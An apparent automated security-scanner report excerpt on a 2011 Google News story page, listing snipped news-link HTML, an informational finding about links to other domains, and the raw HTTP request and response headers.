<div class="aa-inner"><a href="http://www.guardian.co.uk/world/2011/jan/24/papers-palestinian-leaders-refugees-fight" target="_blank" class="usg-AFQjCNGGya3F-AttIyCGzX9tofIwFV9hxA " id="MAA4AEgLUAFgAmoCdXM">Papers reveal how Palestinian leaders gave up fight over refugees</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEaadv9eEgCosx3Fx9YrK8VmjQUUA " href="http://www.jpost.com/MiddleEast/Article.aspx?id=205065" id="MAA4AEgLUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNECRhzSqEJbRN9fKfxZ08aW9SDk8A " href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12270504" id="MAA4AEgLUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHoZJ4kqbRh3uXH99xaN2e36i18eg " href="http://english.aljazeera.net/palestinepapers/2011/01/201112412224387862.html" id="MAA4AEgLUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEV93objFvHJXFeDa0meWiOJcehyw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_1" id="MAA4AEgLUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw " title="Fox News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/mwTGtKZ4NInPwM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/" class="usg-AFQjCNEABo5vi1V46W0WvRcqWvag9t1vuw "> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFDfn7oAgiO1bwSefFQwDxUfjYx7w " href="http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years" id="MAA4AEgMUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://health.usnews.com/health-news/family-health/heart/articles/2011/01/24/lowering-bp-can-help-cut-womens-heart-disease-risk.html" target="_blank" class="usg-AFQjCNGMewBDUXKRrXbz9dDPgk2CfatYqg " id="MAA4AEgMUAFgAmoCdXM">Lowering BP Can Help Cut Women&#39;s Heart Disease Risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.businessweek.com/lifestyle/content/healthday/649165.html" target="_blank" class="usg-AFQjCNFTF19UjawTG0U74K1vgENiWJteKg " id="MAA4AEgMUAJgAmoCdXM">U.S. Heart Disease Costs Expected to Soar</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG3XToTSrtKhlkI7xZ-Y6ypAF1H4g " href="http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/" id="MAA4AEgMUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEShwCjRPP3o8B9Bknfl-uNzkHnTg " href="http://www.bloomberg.com/news/2011-01-24/heart-disease-treatment-cost-to-triple-to-818-billion-by-2030-group-says.html" id="MAA4AEgMUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGcfD1knVticOCLd49-9hkVxr9FiA " href="http://ozarksfirst.com/fulltext?nxd_id=391716" id="MAA4AEgMUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHbJTmNGEga0s_5dekJF3wI_kJcFw " href="http://www.prnewswire.com/news-releases/american-heart-association-rapid-access-journal-report-lowering-blood-pressure-in-middle-aged-women-reduces-heart-disease-risk-114504829.html" id="MAA4AEgMUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA " title="Globe and Mail"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/8VFR3JrwXIVmeM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/" class="usg-AFQjCNEysYm69ZDXP4EpTrC80dSrklUIwA "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEceaM8GMTGP7YZHD2H7DN0PklU7g " href="http://www.bostonherald.com/sports/football/patriots/view.bg?articleid=1311662&amp;srvc=rss" id="MAA4AEgNUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://espn.go.com/blog/boston/new-england-patriots/post?id=4692316" target="_blank" class="usg-AFQjCNFXDwzIsfpbYW4xLUwi4UyNPddplA " id="MAA4AEgNUAFgAmoCdXM">Brady unanimous choice as AP All-Pro</a>
...[SNIP]...
<div class="aa-inner"><a href="http://musketfire.com/2011/01/24/three-patriots-make-the-all-pro-team/" target="_blank" class="usg-AFQjCNGS3y2ZauZ7IEGNf6kOGpRFYvxByw " id="MAA4AEgNUAJgAmoCdXM">Three Patriots Make the All-Pro Team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFtVmCzgJetNQA3YuO6D6T2xCsrGQ " href="http://www.boston.com/sports/football/patriots/extra_points/2011/01/tom_brady_unani.html" id="MAA4AEgNUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDZvJMjOxvPGWf0GTtpiYowmX3nw " href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/brady-mayo-mankins-named-all-pro/" id="MAA4AEgNUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHvwv1Cu4OL92x3XwJPQZYjdPrTWQ " href="http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NFL&amp;id=1163&amp;line=199317&amp;spln=1" id="MAA4AEgNUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://calgary.ctv.ca/servlet/an/local/CTVNews/20110123/detroit-shooting-110123/20110123/?hub=CalgaryHome" class="usg-AFQjCNE0eNokzF4QIbj8Or-8ZrIrj02jXA " title="CTV.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/CM5pzdorOgaBrM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://calgary.ctv.ca/servlet/an/local/CTVNews/20110123/detroit-shooting-110123/20110123/?hub=CalgaryHome" class="usg-AFQjCNE0eNokzF4QIbj8Or-8ZrIrj02jXA "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHS5uJx4olbyF9osDF3gTDGuyuCPg " href="http://www.usatoday.com/news/nation/2011-01-24-detroit-shooting_N.htm" id="MAA4AEgOUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=3i4eR4POFOw">Video:&nbsp;
Detroit rape suspect to be arraigned on several assault counts.
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.detnews.com/article/20110124/METRO01/101240374/1409/metro/Detroit-rape-suspect--31--has-spent-almost-half-his-life-in-prison" target="_blank" class="usg-AFQjCNHDjiKWPniNGy7SY6MsW0KH4Ih34Q " id="MAA4AEgOUAFgAmoCdXM">Detroit rape suspect, 31, has spent almost half his life in prison</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEalDUBH8-HQVONhcKZ4MW2d5rlSw " href="http://www.freep.com/article/20110124/NEWS05/101240382/1007/news05/4-officers-shot-gunman-dead-in-horrifying-attack" id="MAA4AEgOUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCCEQVPyyjZin-IgS-GZbKQg96lw " href="http://www.cnn.com/2011/CRIME/01/24/michigan.rape.suspect/?hpt=T2" id="MAA4AEgOUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFr6r5QBoathNzT09PJwnvBUwlkuA " href="http://www.nytimes.com/2011/01/24/us/24detroit.html?src=twrhp" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N6VU20110124" class="usg-AFQjCNGwTpqGo6WmM4BNaUuWfZ8_PglAEw " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/N_5JZv88v78-mM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N6VU20110124" class="usg-AFQjCNGwTpqGo6WmM4BNaUuWfZ8_PglAEw "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFGDQxlf2HkP_kY_tNzY5iMi_-1RQ " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/donald-driver-super-bowl-vs-steelers-is-packers-to-lose/1" id="MAA4AEgPUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=6_dUkNdoPZI">Video:&nbsp;
Raw Video: Packers Fans Rejoice in NFC Title
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.sportingnews.com/nfl/feed/2011-01/super-bowl-xlv/story/roethlisberger-rodgers-look-to-bounce-back-in-super-bowl" target="_blank" class="usg-AFQjCNGQElfXImuP5gjNiO4sKtARSBFJYA " id="MAA4AEgPUAFgAmoCdXM">Roethlisberger, Rodgers look to bounce back in Super Bowl</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHPpTk4ieUXgu-P8RRRMf8MWo7J0w " href="http://www.nfl.com/news/story/09000d5d81de4791/article/steelers-packers-provide-plan-for-others-to-find-success" id="MAA4AEgPUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGPrr0vkoRqaEiQt3vFQA_4L6QnyA " href="http://www.chron.com/disp/story.mpl/ap/tx/7395456.html" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGQGgM5czT5R6B-ddNymghkSc-UmA " href="http://www.nesn.com/2011/01/charles-woodson-packers-send-barack-obama-a-message-after-nfc-championship.html" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHJIPZyVcw6wNepnm-LyDHFaO6Clg " href="http://profootballtalk.nbcsports.com/2011/01/24/packers-fans-not-happy-with-treatment-in-chicago/" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.nydailynews.com/news/politics/2011/01/23/2011-01-23_cantor_obama_is_a_citizen_of_the_united_states.html?r=news/national" class="usg-AFQjCNFoJU-Zr1h_OLg7wpLzqvR44YWYmg " title="New York Daily News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/-wjwT5njOYurrM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.nydailynews.com/news/politics/2011/01/23/2011-01-23_cantor_obama_is_a_citizen_of_the_united_states.html?r=news/national" class="usg-AFQjCNFoJU-Zr1h_OLg7wpLzqvR44YWYmg "> New York Da... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHD9gmMcX5UbuSNEialO4A3C839Zg " href="http://online.wsj.com/article/BT-CO-20110124-713737.html" id="MAA4AEgQUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://chicagobreakingbusiness.com/2011/01/cantor-declares-state-bankruptcy-law-doa.html" target="_blank" class="usg-AFQjCNGdoU1Lh67pcIeV49PyT7DoCZ4pRg " id="MAA4AEgQUAJgAmoCdXM">Cantor declares state bankruptcy law DOA</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFsJ-xmO_ejoSJAqbQS-S39fJbZpg " href="http://www.reuters.com/article/idUSN2419775920110124" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhzLhkbOVz53QHJ6bmW7YycCP-lA " href="http://latimesblogs.latimes.com/money_co/2011/01/eric-cantor-states-bankruptcy-bailouts-house-majority-leader-gingrich.html" id="MAA4AEgQUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYGF2tFrtqpMAo1sUiv4XCv4MgNA " href="http://tpmdc.talkingpointsmemo.com/2011/01/republicans-in-a-fix-on-infrastructure-spending.php" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVSFWw5bW8lOlkPcETmuGH7fJddA " href="http://voices.washingtonpost.com/44/2011/01/eric-cantor-president-obama-wa.html" id="MAA4AEgQUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://fifthdown.blogs.nytimes.com/2011/01/21/sundays-a-f-c-championship-matchup/" class="usg-AFQjCNHmjAMFU4b0us-F6VwKbdDgRkDgpQ " title="New York Times (blog)"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/1q0LPLp7fAUbbM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://fifthdown.blogs.nytimes.com/2011/01/21/sundays-a-f-c-championship-matchup/" class="usg-AFQjCNHmjAMFU4b0us-F6VwKbdDgRkDgpQ "> New York Ti... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG6qrigwK0jGaJWzKxvUijw-g-xcA " href="http://sports.espn.go.com/new-york/nfl/news/story?id=6054732&amp;campaign=rss&amp;source=NFLHeadlines" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Dye1RPvkcB0">Video:&nbsp;
Jets lose to Steelers in AFC championship game
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/AP08eefa0c9e844584a494106fb21688b5.html" target="_blank" class="usg-AFQjCNFbJ1uuza5woqRu_iLy2zuvPb41xw " id="MAA4AEgRUAFgAmoCdXM">Rex Ryan still feeling Super about Jets&#39; future</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEl1IHYaTs16CTlgmfI4z1L2yr4yg " href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/rex-ryan-jets-have-done-a-pretty-good-job-of-beating-patriots/" id="MAA4AEgRUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFTsAZ0TgzKZ399uC9seSOMhzGZ4w " href="http://nfl.fanhouse.com/2011/01/24/afc-nfc-championship-games-continue-nfls-tv-ratings-boon/" id="MAA4AEgRUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2AZEXbdt5AYsMtu8msDEkOt-3Fw " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/rex-ryan-jets-have-to-learn-to-beat-more-than-just-patriots/1" id="MAA4AEgRUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF9C8wL3fOFsYTsgaPRXS8A3ltpVg " href="http://www.nfl.com/news/story/09000d5d81de420a/article/conference-title-games-garner-best-tv-ratings-in-14-years" id="MAA4AEgRUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/" class="usg-AFQjCNFUbFimVtitAMjquhLMn2StbziAyQ " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/PxjjM3Orb87AzM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/" class="usg-AFQjCNFUbFimVtitAMjquhLMn2StbziAyQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG3JzDql7WAkcCHRYSnsAbbGadxAg " href="http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html" target="_blank" class="usg-AFQjCNH8xyRSjagQTe7qcKbQ1RxMrRntiw " id="MAA4AEgSUAFgAmoCdXM">US backs ban on Ivory Coast cocoa imports</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-24/summary-box-ivory-coast-might-ban-cocoa-exports.html" target="_blank" class="usg-AFQjCNFvQyMenWhWCi8Scnr2HQOzz1Myqw " id="MAA4AEgSUAJgAmoCdXM">Summary Box: Ivory Coast might ban cocoa exports</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8w5-3wv-Joef82tAEi3WkRMlKBg " href="http://abcnews.go.com/Business/wireStory?id=12751095" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGEkYfaKL41vivSMDYuj5cNE_tgpw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_3" id="MAA4AEgSUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHt7HNh28TuTa201PSzxavp-qCB9w " href="http://www.reuters.com/article/idUSTRE70N66I20110124" id="MAA4AEgSUAZgCGoCdXM"><span class="titletext">
...[SNIP]...

20.106. http://news.google.com/news/story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/story

Issue detail

The page was loaded from a URL containing a query string:
  • http://news.google.com/news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddEQewEuUXr-br5MJHZzY7RO2mw5NM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d13\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CIMBEKoCMAw\\x22
The response contains the following links to other domains:
  • http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/
  • http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_1
  • http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_3
  • http://www.detnews.com/article/20110124/METRO01/101240374/1409/metro/Detroit-rape-suspect--31--has-spent-almost-half-his-life-in-prison
  • http://www.digitaltrends.com/computing/twitter-advertising-revenue-swiftly-challenging-myspace/
  • http://www.emarketer.com/Article.aspx?R=1008192
  • http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/
  • http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/
  • http://www.foxnews.com/world/2011/01/24/ap-interview-iaea-critical-irans-cooperation/
  • http://www.freep.com/article/20110124/NEWS05/101240382/1007/news05/4-officers-shot-gunman-dead-in-horrifying-attack
  • http://www.gstatic.com/news/img/cleardot.gif
  • http://www.gstatic.com/news/img/favicon.ico
  • http://www.gstatic.com/news/img/logo/en_us/news.gif
  • http://www.guardian.co.uk/media/2011/jan/08/us-twitter-hand-icelandic-wikileaks-messages
  • http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security
  • http://www.guardian.co.uk/world/2011/jan/24/moscow-airport-bomb-kills-dozens
  • http://www.guardian.co.uk/world/2011/jan/24/papers-palestinian-leaders-refugees-fight
  • http://www.huffingtonpost.com/2011/01/13/new-zodiac-sign-dates-oph_n_808567.html
  • http://www.huffingtonpost.com/2011/01/17/starbucks-new-size-trenta-graphic_n_810083.html
  • http://www.huffingtonpost.com/2011/01/20/two-suns-twin-stars_n_811864.html
  • http://www.idahostatejournal.com/news/national/article_4f292c44-2808-11e0-86d1-001cc4c03286.html
  • http://www.jpost.com/MiddleEast/Article.aspx?id=205065
  • http://www.jsonline.com/news/milwaukee/114509574.html
  • http://www.ksby.com/news/locals-work-out-in-honor-of-the-late-fitness-guru-jack-lalanne
  • http://www.latimes.com/news/local/la-me-mega-storm-20110123,0,1868244.story
  • http://www.latimes.com/news/local/la-me-surfer-mavericks-20110124,0,4017331.story
  • http://www.latimes.com/news/obituaries/la-me-jack-lalanne-20110124,0,6764075.story
  • http://www.longislandpress.com/2011/01/24/oprahs-sister-oprahs-half-sister/
  • http://www.marketwatch.com/story/rocktenn-to-buy-smurfit-stone-for-35-billion-2011-01-24
  • http://www.mercurynews.com/breaking-news/ci_17184991
  • http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html
  • http://www.miamiherald.com/2011/01/24/2031135/slain-officers-funeral-procession.html?asset_id=Funeral%20procession%20for%20slain%20Miami-Dade%20officers&asset_type=html_module
  • http://www.missourinet.com/2011/01/24/st-louis-based-smurfit-stone-sells-for-3-5b/
  • http://www.msnbc.msn.com/id/41220540/ns/business-motley_fool/
  • http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/
  • http://www.msnbc.msn.com/id/41238598/ns/world_news-europe/
  • http://www.naturalnews.com/031076_USDA_bird_deaths.html
  • http://www.newsweek.com/blogs/the-gaggle/2011/01/24/why-no-one-will-watch-the-state-of-the-union.html
  • http://www.nfl.com/news/story/09000d5d81de4791/article/steelers-packers-provide-plan-for-others-to-find-success
  • http://www.ny1.com/content/news_beats/politics/132719/suspect-in-arizona-shooting-pleads-not-guilty/Default.aspx
  • http://www.nytimes.com/2011/01/18/opinion/18brooks.html
  • http://www.nytimes.com/2011/01/20/business/20walmart.html?src=busln
  • http://www.nytimes.com/2011/01/23/books/review/Paul-t.html
  • http://www.nytimes.com/2011/01/24/business/24fees.html?src=busln
  • http://www.nytimes.com/2011/01/24/technology/24cook.html
  • http://www.nytimes.com/2011/01/24/us/24detroit.html?src=twrhp
  • http://www.oregonlive.com/politics/index.ssf/2011/01/2011_state_of_the_union_-_poli.html
  • http://www.pcmag.com/article2/0,2817,2376161,00.asp
  • http://www.pcmag.com/article2/0,2817,2376180,00.asp
  • http://www.pcmag.com/article2/0,2817,2376185,00.asp
  • http://www.pcworld.com/businesscenter/article/217478/firefox_donottrack_feature_has_a_fatal_flaw.html
  • http://www.pcworld.com/businesscenter/article/217509/motorola_xoom_tablets_price_will_shoot_it_in_the_foot.html
  • http://www.people.com/people/article/0,,20460315,00.html
  • http://www.politico.com/news/stories/0111/48043.html
  • http://www.prnewswire.com/news-releases/american-heart-association-rapid-access-journal-report-lowering-blood-pressure-in-middle-aged-women-reduces-heart-disease-risk-114504829.html
  • http://www.reuters.com/article/idUS198178545820110124
  • http://www.reuters.com/article/idUSN2419720820110124
  • http://www.reuters.com/article/idUSN2419775920110124
  • http://www.reuters.com/article/idUSTRE70N2TQ20110124
  • http://www.reuters.com/article/idUSTRE70N4AE20110124
  • http://www.reuters.com/article/idUSTRE70N4VB20110124
  • http://www.reuters.com/article/idUSTRE70N5P220110124
  • http://www.reuters.com/article/idUSTRE70N5SV20110124
  • http://www.reuters.com/article/idUSTRE70N5ZW20110124
  • http://www.reuters.com/article/idUSTRE70N66I20110124
  • http://www.reuters.com/article/idUSTRE70N6Q420110124
  • http://www.reuters.com/article/idUSTRE70N6U520110124
  • http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NFL&id=1163&line=199317&spln=1
  • http://www.slate.com/id/2281146/
  • http://www.sportingnews.com/nfl/feed/2011-01/super-bowl-xlv/story/roethlisberger-rodgers-look-to-bounce-back-in-super-bowl
  • http://www.suntimes.com/3470538-417/court-emanuel-appellate-chicago-law.html
  • http://www.technewsworld.com/story/Firefox-Do-Not-Track-Feature-Seen-as-Toothless-71710.html
  • http://www.telegraph.co.uk/news/worldnews/northamerica/usa/barackobama/8277266/State-of-the-Union-Barack-Obama-to-use-address-to-rebrand-himself-in-the-centre.html
  • http://www.theatlantic.com/technology/archive/2011/01/the-inside-story-of-how-facebook-responded-to-tunisian-hacks/70044/
  • http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/
  • http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/
  • http://www.theglobeandmail.com/news/world/emanuels-name-removed-from-ballot-for-chicago-mayor-lawyer-says/article1880888/
  • http://www.theglobeandmail.com/sports/football/packers-headed-to-super-bowl/article1880207/
  • http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/
  • http://www.thehollywoodgossip.com/2011/01/christina-aguilera-to-sing-national-anthem-at-super-xlv/
  • http://www.thestar.com/sports/football/article/927264--super-bowl-notes-aguilera-to-croon-anthem
  • http://www.thestreet.com/story/10982553/1/tax-preparation-halliburton-hot-trends.html?cm_ven=GOOGLEN
  • http://www.thirdage.com/news/rock-tenn-buys-smurfit-stone-35-billion_1-24-2011
  • http://www.usatoday.com/news/nation/2011-01-24-detroit-shooting_N.htm
  • http://www.usatoday.com/yourlife/fitness/exercise/2011-01-25-lalanneobit24_ST_N.htm?csp=ylf
  • http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html
  • http://www.voanews.com/english/news/Blast-Kills-At-Least-10-at-Moscow-Airport-114481529.html
  • http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/21/AR2011012106553.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html
  • http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404850.html
  • http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years
  • http://www.wired.com/epicenter/2011/01/google-voice-lsd-trip/
  • http://www.wired.com/epicenter/2011/01/times-paywall/
  • http://www.wired.com/gadgetlab/2011/01/windows-phone-7-jailbreakers/
  • http://www.wired.com/threatlevel/2011/01/twitter/
  • http://www.youtube.com/?hl=en&tab=n1
  • http://www.youtube.com/watch?v=1wbQ-zmLKqg
  • http://www.youtube.com/watch?v=3i4eR4POFOw
  • http://www.youtube.com/watch?v=6_dUkNdoPZI
  • http://www.youtube.com/watch?v=90gldve1V1g
  • http://www.youtube.com/watch?v=A1JzTAhSoKA
  • http://www.youtube.com/watch?v=Ay5CfV-_438
  • http://www.youtube.com/watch?v=Dye1RPvkcB0
  • http://www.youtube.com/watch?v=Id_W6wgEIGo
  • http://www.youtube.com/watch?v=Oy3zTTuXoPU
  • http://www.youtube.com/watch?v=QMHmzs0RsUA
  • http://www.youtube.com/watch?v=V36fQu0Vk80
  • http://www.youtube.com/watch?v=jKYkFgMz7fQ
  • http://www.youtube.com/watch?v=pUzMhGLMFgQ
  • http://www.youtube.com/watch?v=uwXNpYAgahg
  • http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162
  • http://www.zeenews.com/news682964.html

Request

GET /news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddEQewEuUXr-br5MJHZzY7RO2mw5NM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d13\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CIMBEKoCMAw\\x22 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=cX57RyFcFhGXeBWYxGmdKRnJK5jU8LbzJUkskuOo3Xc0yCG6_QYKJl1hNiPV-8JP_2-ZrXSXQum39SgiJNEagRRJAzOJp6wHI1J_d2-Na0Ybn57rjbe8j4n3t1ZfBDgJ;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:14 GMT;HttpOnly
Date: Mon, 24 Jan 2011 22:43:14 GMT
